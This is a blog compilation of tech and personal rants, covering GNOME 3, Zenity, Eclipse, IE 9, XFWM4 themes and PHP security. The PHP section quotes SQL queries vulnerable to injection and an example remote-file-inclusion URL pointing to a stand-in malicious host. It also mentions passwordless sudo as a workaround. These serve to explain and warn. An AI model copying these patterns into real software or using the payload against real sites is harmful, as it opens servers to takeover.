Kirsle.net
Apparently, Mac OS X Lion supports Emoji icons like iOS does.
Please, nobody get in the habit of using these. Anywhere. Unless you're talking specifically to other Apple users.
Nobody else supports Apple's particular variant of Emoji icons as well as Apple does. For Linux and Windows users, all your Emoji icons you paste in Twitter updates don't work. Most of the icons will be completely broken for these users (rendering as a block character), and the few icons that do render, won't look nearly as good as on Apple devices: they'll just look like Unicode characters, i.e. using the same black-and-white font color as everything else. Not full color icons.
It's already bad enough that cross-platform mobile apps (iOS and Android) have idiots using Emoji icons everywhere (which do not display on Android at all, but show as broken block characters), but for desktop Apple users to be able to paste Emoji icons everywhere else is just the most terrible news as of late.
Don't use them. Period.
The album is here: http://imgur.com/a/WAKF2
To add to the reasons why GNOME 3 impacts other areas of the Linux ecosystem in ways I wish it wouldn't, they have changed the behavior of zenity and removed a feature just because it no longer makes sense for GNOME 3.
Zenity, btw, is a command line program for displaying simple dialog boxes and things that may be useful for bash scripts. It can pop up alerts, progress bar windows, open/save dialogs, etc.
One feature it used to have was --notification, which let you put an icon in the Notification Area ("system tray") on your desktop. But now, since GNOME 3 doesn't have the same concept of the Notification Area as other desktop environments, Zenity's --notification option no longer puts an icon in the Notification Area.
Now it uses GNOME 3's style of notification... which is, the same behavior as notify-send - it pops up a Growl-like black bubble in the corner of your screen with a temporary message (like "New updates are available").
This sucks.
I was playing with writing a desktop Google Voice app for Linux, which would have an icon in the Notification Area and notify about new texts and things. I was going to just use Tk for the GUI (even though it's ugly as sin on Linux) and use Zenity only for the notification icon. But I can't do that now! Now I might as well make my GUI in GTK+ so I can use the Gtk2 module for the notification icon.
GNOME developers, the universe does not revolve around GNOME. If Zenity's --notification is just going to duplicate the functionality of notify-send, you might as well just have switched to notify-send and leave Zenity how it was before.
I'd written a Perl script a while back that would act as a super simple front-end to Mednafen, an NES and GameBoy emulator. It just used Zenity to open a file select dialog to let you browse for a ROM to load.
But now, Zenity's file selection dialog doesn't have any way of letting you specify which directory it should look in by default. It used to start in whatever the script's current working directory was, but now it ignores all that and always starts in the "Recently Opened Files" list.
Do we need to fork Zenity now? This is so ridiculous.
I love it when the law blows up in the face of the Soccer Mom Brigade.
"Soccer Mom Brigade?" It's a term I made up to describe the sort of person who complains about this sort of thing. Dumb people (usually overbearing parents who don't know anything but think they need to have an opinion about their kids' lives, hence, "soccer mom") find something--no, they seek out something to bitch about, and they write angry letters to whoever they need to in an attempt to get the thing banned for everybody.
If the target of the complaints doesn't ban it straight away, the soccer mom goes on a crusade, gathering up all the other soccer moms in the neighborhood and forms the Soccer Mom Brigade, where they become very loud, very obnoxious, and make their point heard across the country, usually getting the media involved. And then stupid stuff gets banned for stupid reasons.
Example I can think of offhand: the Pokémon episode "Tower of Terror" (where they visit the Ghost Pokémon Tower in Lavender Town), because the Soccer Mom Brigade thought their little 5-year-old would relate the title of the episode to the September 11 attacks. And they succeeded. Bullshit.
First of all, I don't believe the AI in Pokemon has any reason to cheat. Pokemon battles are by default completely fair. Every Pokemon owned by the enemy trainer is a Pokemon you could also go out and capture or trade to get. And all the moves their Pokemon knows are moves you could teach to your own Pokemon.
But regardless the AI feels the need to cheat. Some examples I've seen:
How it cheats: it knows exactly which move your Pokemon is going to wake up on, and it will use Sleep Powder or Sing on this turn to put your Pokemon back to sleep (these moves would fail if your Pokemon is already asleep).
Evidence: the AI fails sometimes. If the enemy Pokemon is too fast, it will use Sleep Powder, it will fail because your Pokemon is already asleep, and then your Pokemon will wake up. This happens all the god damn time. You can also confuse the AI by using an item on the turn your Pokemon is about to wake up on (but, this is all down to chance, since you don't know which turn it will wake up on).
But I foiled its plans by healing my Gyarados. It followed up with a Quick Attack which did exactly 14 damage.
Protect always goes first in the turn it's used, and it prevents the opponent's move from hitting.
Bruno's Forretress is a cheating bastard though, because it only uses Protect when you're going to use your most powerful move. Forretress is weak to fire, so I used my Typhlosion's Blast Burn move, which is a very powerful fire attack. Forretress used Protect so it failed; I tried again, it used Protect a second time. Tried again, and this time it hit, because Forretress knows that Protect can't be used more than twice.
I battled Bruno later with my Umbreon. I used Dark Pulse, the most powerful move my Umbreon knows, and Forretress used Protect to block it.
I figured Forretress was gonna use Protect again, so I used Faint Attack instead. This hit. So I tried Dark Pulse again -- Forretress used Protect and blocked it. I tried again, Forretress tried Protect again, but it failed (you can't use it more than twice). So, I confused the AI there.
Anyway, I just think this whole thing is ridiculous. The AI has no reason to cheat. It wouldn't be that hard for Nintendo to program the AI to pretend it doesn't know all this stuff that it shouldn't know about the battle (hint: they just don't need to program it to look). There's probably logic in the code like, "if the player chose the player's most powerful move, and protect hasn't been used twice in a row now, use protect". Nintendo should just NOT write that code. Pokemon battles are fair by default.
I hate it.
I have to use Eclipse because my current project at work is a Java project, with a massive amount of source code, and I have no idea how I'd compile and run the project except with Eclipse. Also, there's a significant amount of source code managed by CVS in a hundred different projects, and authentication is made complicated by a VPN and I have no intentions of trying to manage CVS via command line.
Eclipse creates more work for me just by being Eclipse. The CVS system on it is broken, and I frequently get CVS conflicts on files that I didn't even touch between updates, which cause syntax errors, some of which aren't immediately obvious (sometimes they cause runtime errors instead of compile-time errors).
Then, Eclipse likes to just crash from time to time with no explanation. I ended up jury-rigging a chain of shell scripts just to start Eclipse to try to minimize how often it crashes, and catch the errors (if any) when it does.
Namely, I needed to use ulimit to increase the number of filehandles Eclipse can have to keep it from crashing. Only root can do this, though, and I don't want to run Eclipse as root, because I don't want new files coming in through CVS to be owned as root and make my job more difficult.
So, just to start Eclipse, I had to set up /etc/sudoers to not require a password to use sudo, and allow sudo to run without a TTY (these are both bad security practices, btw), and to sudo execute this script as root:
$ cat start_eclipse.sh #!/bin/bash # increase fileno limit ulimit -n 50000 sudo -u kirsle "./start_eclipse.pl" &This uses root only to increase the filehandle limit, then it switches to kirsle (my user) so nothing further runs as root, and runs start_eclipse.pl, a Perl script that attempts to catch errors when Eclipse goes down like a cheerleader at homecoming:
$ cat start_eclipse.pl
#!/usr/bin/perl -w
my $out = `./eclipse 2>&1`;
if ($? != 0) {
$out =~ s/\'/\\'/g;
system("zenity", "--info", "--text", $out);
}
Ugh. I strongly prefer a plain old text editor like vim or gedit.
I've been very sceptical about GNOME 3 and gnome-shell (as I've talked about here, here and here). So, I had jumped ship to XFCE a couple years ago and will not be a GNOME user in the foreseeable future.
Now that Fedora is finally shipping GNOME 3, though, the GNOME dev team has again impacted me in ways I wish they wouldn't.
The first impact of GNOME on the rest of the software ecosystem is that they moved to GTK+ 3.0 and everybody else is still catching up. How this affects XFCE?
Setting any custom theme in XFCE makes all GNOME apps look ugly because there is no matching GTK 3 theme. Oh well, you think, just don't run GNOME desktop apps in XFCE?
The problem is that Red Hat and Fedora drink so much of the GNOME kool-aid, that all their other apps that aren't GNOME specific are also using GTK 3. This includes: the Network Manager (seen in the screenshot), and all the PackageKit GUIs (for graphically installing updates). There are probably other things too. This means that, to use XFCE or basically anything besides GNOME, you have to deal with ugly themes on a lot of "core" Fedora GUIs.
This problem should hopefully go away in the next release or two of Fedora, as XFCE and other apps are updated to GTK 3. I just hope Firefox doesn't decide to make the switch too early, though... that would drive me nuts if Firefox started looking this ugly.
My temporary hack of a workaround is that I made a symlink for gtk-3.0 for my current theme that points to the default theme's gtk-3.0, so at least GTK 3 apps don't look ugly... but they still don't "fit in" with my GTK 2 apps.
This is all gone now.
Why? Oh, because GNOME Shell has its own volume control icon built right into the desktop GUI directly, and it therefore has no need for a Notification Area based applet anymore. Never mind that other desktop environments like XFCE would find such a thing useful. Now I'm forced to go back to the old school "Mixer" applet in XFCE, which is nowhere near as elegant as the GNOME volume control applet used to be.
I'm tired of this "the whole universe revolves around GNOME" mentality that the GNOME developers exhibit. Most other desktop environments play nice with each other, most try to follow Freedesktop.org standards, but GNOME... GNOME wants to be your desktop environment; it wants to be your entire operating system.
gnome-volume-control-applet to gnome-sound-applet, provided by the package control-center rather than gnome-media. Right-clicking the icon to go to the Sound Preferences brings up a GTK-3 GUI that includes a volume slider that goes to 150%.So all hope is not lost, yet.
Microsoft STILL doesn't get it!
It appears that IE 9 now, finally supports rounded borders via CSS (border-radius), and they finally support the box-shadow in CSS too (adding shadows or glows around a block-level element like a div). But know what they still don't support? text-shadow - adding shadows or glows to text.
So, Kirsle.net looks a bit nicer on IE 9--because the round borders on my site's panels works now. But the glowy effect I have behind my headers doesn't show up. How could Microsoft finally add box-shadow support but not add text-shadow?
Oh, and that border-radius support? It seems that it only works when all four corners have a radius. If you only want a radius on 1, 2 or 3 corners and leave the rest square, IE 9 won't play ball. All corners are square in this case.
This is far from the promise that "Internet Explorer 9 will be a modern HTML 5 capable browser just like all the other ones out there that don't suck."
Microsoft just needs to throw in the damn towel already. They are horrible at making web browsers. Give up already.
They're way too much drama.
It seems as though every single guy I meet on any such gay website, automatically seems to assume that I'm going to hookup with them, or date them or be with them forever and ever or something stupid like that. Never mind that I explicitly spelled out that I'm only after friends and chatting on the site in question.
And then they get all stupid and insecure about whether or not I'm interested in them. This happens all the time but here's the last example that really pissed me off.
This Brandon character I met from who-knows-what gay site, I had him on my Yahoo! buddy list and on Facebook. He IM's me on Yahoo saying, "so do you not want me to talk to you". I wonder for a second who this is, and check my chat logs, but this is a new computer and I have no prior chat logs. I say I don't remember him, and he tells me we're facebook friends, so I go check. Not remembering still I just reply, "I have no reason not to want to talk to you."
I then notice I had an older chat open with him from Facebook where, the conversation ended with him saying,
(08:35:56 PM) Brandon: not interested in me? (08:38:45 PM) Brandon: guess not
Yeah, I forgot to reply within 3 minutes and he assumes an answer already. I had seen this earlier, thought it was bullshit (I hate when random strangers on the Internet already start getting this insecure on me), and just ignored it. But now I put two and two together and saw that this is who I'm chatting with now on Yahoo.
So I add, "but I do wanna say I'm not looking for a b/f or a hookup or anything, only friends, is that okay?" -- and he apparently got his ego bruised by this, and tries to attack me, and say "did i ask for any of that? /ok sorry / i wont talk to you anymore / dont assume people wanna hook up and marry you"
I didn't assume. I had his Facebook chat log from earlier in the day. I tell him what he said earlier and how it looks like he wanted to be more than friends, and I paste him the chat logs. He says nothing further, and just deletes me from Facebook.
This is the sort of stupid gay drama bullshit that I do not have time to put up with. Other examples of this is when some guy wants to meet me very quickly, and I reply back saying, "I need to get to know you first before I meet you." If their response to this is, "well what do you want to know?".... this is not the correct answer. That's NOT what I meant. And I'll quit talking to him at this point.
Another example is when a guy starts getting all insecure on me and says something stupid like, "I guess you're not into me, I'll just leave you alone then." Good. If you're gonna act like a little bitch, I didn't wanna talk to you in the first place.
The annoying part about all of this is how widespread it is. It seems that every single guy I chat with on any gay website behaves this way. I don't have the time to put up with this sort of stupid bullshit.
As for the subject of this blog post, it's a joke from the IRC room I've gone to since I was 12 as I was ranting about this exact thing.
[Kirsle] I don't have time for this kinda bullshit [Kirsle] seriously [Kirsle] any ONE guy from any site is so much high maintenance and stress [Kirsle] tons of guys from tons of sites is just too damn much [Admin_Todd] what kind of bullshit do you have time for? [Kirsle] more serious bullshit Todd, not this stupid stuff :P [Admin_Todd] oh ok [MattB] lol [Admin_Todd] Big Bro give Casey some really serious bullshit * Big_Brother gives Casey some really serious bullshit :P [Kirsle] :P [MattB] haha
But surprisingly, I'm not going to direct my rant toward GTK+ themes. Everybody who's ever used Linux knows that 99% of the crap on gnome-look.org isn't worth using. I've very rarely used a GTK+ theme that correctly solves the problem of, "your panel background image tiles across the shutdown dialog so you can't read the text of the dialog," but I digress.
No, this is about XFCE window manager themes. Themes for XFWM4.
XFWM4's themes are quite simple, or at least if you're making a flat pixmap theme they are. All you need to do is have a folder full of XPM files with certain file names, and XFWM4 does the rest. It's easy! So why does everybody screw this up?
The window manager theme I wanted on XFCE most recently was Clearlooks. Yes, the standard Metacity theme that comes with every single GNOME based distribution ever. I wanted it on XFCE, but couldn't find a good version of an XFWM4 theme for it that didn't suck.
I found one that got kind of close. Clearlooks-Xfce-Colors, in fact. It looks good, except he made a mistake putting the theme together: the maximize/restore button behavior is broken. Apparently, he couldn't figure out how XFWM4 handles the "Restore" button on a maximized window. So, for the active focused window, the "Maximize/Restore" button will always use Maximize, and every inactive window will always use Restore instead.
So for the active window, there's NO way of telling whether it's maximized or not, because the button always shows the exact same icon. Same goes for inactive windows.
The official XFWM4 theme how-to explains how this works. You just need file names like "maximize-toggled-active.xpm" or "maximize-toggled-inactive.xpm". That's it. Now your "Restore" button works fine.
Another common problem I've seen. Take for example the Vista Basic theme here. It looks good in the screenshots, yes? That's because the title is centered.
When you uncenter the title, or even just have a narrow window open (my Pidgin buddy list for example), huge problems with the theme become apparent. If you left-align the title, there's a huge margin (in the realm of 60 pixels) on the left of the title. WTF? And on a narrow window like Pidgin's buddy list, the title will be completely devoured by the margins to the point you can't see the title anymore.
Why is this? XFWM4 themes have five different title images. Appropriately named "title-1-active.xpm" through "title-5-active.xpm". These 5 images make up the title. If title-1 is 60 pixels wide, it means your title will have a 60 pixel margin on the left. So, make your title images as thin as you possibly can (4 pixels is great) unless you explicitly have a need to do something fancy with your titles.
I have never once installed a third party XFWM4 theme that has been high enough quality. The usual procedure when I really want a certain style is: find one that's close, find out it fails super hard because the creator is a complete noob and didn't even bother to read the official documentation before making his theme, and then either try to hack it until it works OR just scrap it and create my own from scratch. And then re-release the theme back to xfce-look.org for others to use.
So, here are my better copies of various window manager themes for XFWM4:
End of rant. Now, about those GTK+ themes...
In short: PHP has a tendency to be vulnerable-as-a-default, the barrier to entry is so low that every noob who barely just learned HTML can already begin writing dangerous code, even the largest web apps in PHP have gaping security holes, and I consider PHP itself to be just an elaborate content management system more than a real programming language.
To break down each of those points:
The last time I made a solid effort to learn to code in PHP, I came to realize that the default php.ini on my system had some rather stupid options turned on by default. For instance, the include() method would be allowed to include PHP code from a remote URL beginning with "http://". It's things like this that make PHP insecure as a default. I now have learned to carefully prune through my php.ini before installing any PHP web apps on a new server just to make sure no stupid defaults are enabled that will leave my server vulnerable.
The barrier to entry is so low in PHP that people who have no business writing program code are given the tools to do so. A good friend of mine does freelance web security consulting and says that a very good majority of PHP-powered sites he's come across have been vulnerable to SQL injection, and attributes this to the fact that many PHP tutorial sites don't mention SQL injection when they get to the chapter about databases. They'll recommend that you just interpolate variables directly into your SQL queries.
Case in point: the very first result for Googling "php mysql tutorial" that isn't from php.net is this link: PHP/MySQL Tutorial - Part 1. When this tutorial gets to the insertion part, it recommends you just formulate a query like this:
SELECT * FROM contacts WHERE id='$id'
And this:
SELECT * FROM tablename WHERE fieldname LIKE '%$string%'
Coding practices like this will leave you a lot of pain to come in the future. I'm not a PHP tutorial site so I won't even bother to explain how to avoid SQL injection in PHP. I won't use any of your code on my server so your own stupidity will be your own downfall, and it won't be my problem.
As an example of a large PHP web app having gaping wide security holes, just read about how my server got hacked through phpMyAdmin. In short, there was a PHP script in the "setup" folder that ended with a .inc.php file extension (indicating it was meant to be included and not requested directly over HTTP), and it would execute system commands using data provided by the query string. I've ranted about how badly I hate PHP even more because of this on that blog post. And that in Perl, this sort of thing wouldn't even happen, because an included script would have to go out of its way to read the query string; it wouldn't just use the query string "by accident" like PHP scripts are apt to do.
Besides SQL injection being one of THE most popular attack vectors for anything written in PHP, but if I ever hear about a PHP exploit besides that it almost invariable is this: somebody fooled a PHP script into including a PHP source from a remote domain. Example:
Your site has URLs that look like this, http://example.com/?p=home
And your "index.php" there will take "p=home" and include "home.php" to show you the home page. Okay, what about this then?
http://example.com/?p=http://malicious.com/pwned.php
And your index.php includes pwned.php from that malicious looking URL and now a hacker can run literally any code they like on your server. I've witnessed sites being pwned by this more times than I can care to count, oftentimes because the php.ini was misconfigured as a default.
Moving on to the last point, I don't consider PHP to be a real programming language. It is more like a web framework, like Drupal or MovableType or Catalyst, that is packed full of tools specifically geared towards the web. PHP has thousands of built in functions for everything a web app could imagine needing to do, from MySQL to CGI. The web page "PHP in contast to Perl" sums up all of the problems with PHP's vast array of global functions. They're inconsistently named and many of them do extremely similar things.
Contrast that to Perl, where the core language only provides the functions you would expect from a real programming language, and to do anything "cool" you'll need to include modules which provide you with more functionality. PHP fans often say it's a good thing that PHP has MySQL support built right in, but then I point them to the functions mysql_escape_string and mysql_real_escape_string. What is with that? Was the first function not good enough, that somebody had to write a second one that escapes strings better? And they had to create a second function so they don't break existing code that relies on the behavior of the first?
In Perl, if I was using the DBI module for SQL, and I had a problem with the way that DBI escapes my strings, guess what I could do: I could write my own module that either inherits (and overrides) from DBI, or write a new module from scratch with an interface very similar to DBI, and use it in my code. My code could still be written the exact same way:
my $dbh = Kirsle::DBI->connect("...");
my $sth = $dbh->prepare("INSERT INTO users SET name=? AND password=?");
$sth->execute($username,$password);
Besides the "programming language" itself, just take a look inside php.ini. What's that, you ask? It's a global PHP configuration file. Yeah, that's right: the behavior of every PHP script on your entire server can be dictated by a single configuration script. Aren't config files supposed to be a part of, oh I don't know, applications? Content management systems? And not as part of a programming language itself?
On one hand this explains why a lot of free web hosts allow you to use PHP but not Perl; PHP can be neutered and have all of its potentially risky functionality taken away by carefully crafting your php.ini whereas Perl, being a REAL programming language, can't be controlled any more easily than a C binary can. But on the other hand, just look inside php.ini -- there's options in there for how PHP can send e-mails, and how it would connect to a database by default. It even breaks down the databases by type - MySQL, PostgreSQL, MSSQL, etc. Shouldn't database details be left up to the actual PHP code? Apparently not.
So there you have it. I'll never use PHP. It's not even a real programming language. Just a toolkit for rapidly getting a website up and running. What's another name for that? Oh, a Content Management System. Doesn't a PHP CMS sound redundant now? ;)
0.0019s.
